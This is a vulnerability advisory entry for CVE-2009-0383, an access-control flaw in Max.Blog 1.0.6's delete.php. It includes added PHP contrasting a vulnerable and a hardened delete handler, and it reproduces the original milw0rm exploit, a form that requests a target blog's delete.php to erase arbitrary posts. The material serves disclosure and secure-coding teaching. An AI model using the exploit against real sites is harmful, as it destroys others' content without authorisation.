Mzbservices Max.Blog 'delete.php' Delete Post Authentication Bypass Vulnerability

Vulnerability ID: 1117268    Type: Permissions, Privileges and Access Control
Published: 2009-01-20    Updated: 2009-02-02
CVE: CVE-2009-0383    CNNVD-ID: CNNVD-200902-008
Platform: PHP    CVSS score: 6.4
|Sources
https://www.exploit-db.com/exploits/7835
https://cxsecurity.com/issue/WLB-2009020084
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-008
|Details
Max.Blog is an open-source blog publishing and management tool. delete.php in Max.Blog 1.0.6 does not properly restrict access, which allows remote attackers to delete arbitrary blog posts via a direct request.
|Exploit
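The defect described above is a state-changing handler that acts on any request that names a post, without establishing who is asking or whether they may act on that post. The following is an added example, not Max.Blog's own code, that places a handler with that defect beside a hardened one. The table layout (posts(id, author_id)), the session fields (user_id, csrf_token) and the PDO connection are assumptions made for illustration, and the rows it operates on are constructed.

```php
<?php
// Added example, not Max.Blog's code. Contrasts a delete handler that honours
// any direct request (the class of defect in the advisory) with a hardened one.
// Assumptions (illustrative, not from the advisory): a table posts(id, author_id),
// a session array carrying user_id and csrf_token, and a PDO connection.

declare(strict_types=1);

// Vulnerable pattern: ?post=N&confirm=yes is enough. Nothing establishes who
// is asking or whether they may delete this particular post.
function delete_post_unchecked(PDO $db, array $query): bool
{
    if (($query['confirm'] ?? '') !== 'yes') {
        return false;
    }
    $stmt = $db->prepare('DELETE FROM posts WHERE id = ?');
    $stmt->execute([(int)($query['post'] ?? 0)]);
    return $stmt->rowCount() === 1;
}

// Hardened pattern:
//  1. only a POST may change state (a GET reached via a link or image must not);
//  2. the caller must hold an authenticated session;
//  3. the request must carry the session's anti-CSRF token;
//  4. the DELETE is scoped to rows the caller owns, so being logged in does
//     not by itself grant authority over other users' posts.
function delete_post_checked(PDO $db, array $session, array $post, string $method): bool
{
    if ($method !== 'POST' || empty($session['user_id'])) {
        return false;
    }
    $token = $post['csrf_token'] ?? '';
    if (!is_string($token) || $token === ''
        || !hash_equals((string)($session['csrf_token'] ?? ''), $token)) {
        return false;
    }
    $id = filter_var($post['post'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        return false;
    }
    $stmt = $db->prepare('DELETE FROM posts WHERE id = ? AND author_id = ?');
    $stmt->execute([$id, (int)$session['user_id']]);
    return $stmt->rowCount() === 1;
}

// Demonstration on an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, author_id INTEGER NOT NULL)');
$db->exec('INSERT INTO posts (id, author_id) VALUES (1, 10), (2, 20), (3, 20)');

$session = ['user_id' => 10, 'csrf_token' => bin2hex(random_bytes(16))];

$results = [
    // anonymous direct request: the unchecked handler deletes post 2
    'unchecked, anonymous GET'  => delete_post_unchecked($db, ['post' => '2', 'confirm' => 'yes']),
    // same request shape against the checked handler: refused (GET, no session)
    'checked, anonymous GET'    => delete_post_checked($db, [], ['post' => '3'], 'GET'),
    // authenticated with a valid token, but post 3 belongs to user 20: refused
    'checked, owner mismatch'   => delete_post_checked($db, $session,
        ['post' => '3', 'csrf_token' => $session['csrf_token']], 'POST'),
    // authenticated owner with a valid token over POST: allowed
    'checked, owner with token' => delete_post_checked($db, $session,
        ['post' => '1', 'csrf_token' => $session['csrf_token']], 'POST'),
];

foreach ($results as $case => $deleted) {
    printf("%-28s -> %s\n", $case, $deleted ? 'deleted' : 'refused');
}
```

The `confirm=yes` parameter in the vulnerable form is a usability prompt, not a control: anything a browser can send, a script can send. The hardened version also shows why an authentication check alone would be an incomplete fix, since the ownership condition in the WHERE clause is what stops one user deleting another's posts.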
<html>
<head>
<title>Max.Blog 1.0.6 Delete Post Exploit</title>
</head>

<body>
<p align="center">
<b>Max.Blog 1.0.6 Delete Post Exploit</b><br /><br />
<b>Discovered by SirGod<br />
Thanks to <b>Nytro</b><br />
Please visit : <br />
------------------------<br />
www.mortal-team.org<br />
------------------------<br />
www.h4cky0u.org<br />
------------------------<br />
www.xpl0it.info<br />
------------------------<br />
www.anti-intruders.org<br />
------------------------<br />
</b>
</p>

<?php
// On submit, build the URL of the target blog's delete.php and request it
// directly; the handler deletes the post without checking who is asking.
if(isset($_POST['submit']))
{
    $site=$_POST['site'];
    $post_id=$_POST['post_id'];
    // The response body is fetched but never inspected, so "Done!" is
    // printed whether or not the deletion happened.
    $pagina=file_get_contents("http://".$site."/delete.php?post=".$post_id."&confirm=yes");
    print "<p align=\"center\">Done!</p><br />";
}

?>

<form method="POST">
<p align="center">
Site: www. <input type="text" name="site" value="site.com/path" /><br />
(without http, www and trailing slash)<br />
Post ID: <input type="text" name="post_id" value="1" /><br /><br />
<input type="submit" name="submit" value="Delete" />
</p>
</form>
</body>
</html>

# milw0rm.com [2009-01-20]
|References

Source: www.mzbservices.com
Link: http://www.mzbservices.com/show_post.php?id=72
Source: SECUNIA
Name: 33590
Link: http://secunia.com/advisories/33590
Source: XF
Name: maxblog-delete-security-bypass(48125)
Link: http://xforce.iss.net/xforce/xfdb/48125
Source: BID
Name: 33368
Link: http://www.securityfocus.com/bid/33368
Source: MILW0RM
Name: 7835
Link: http://www.milw0rm.com/exploits/7835
Source: OSVDB
Name: 51482
Link: http://osvdb.org/51482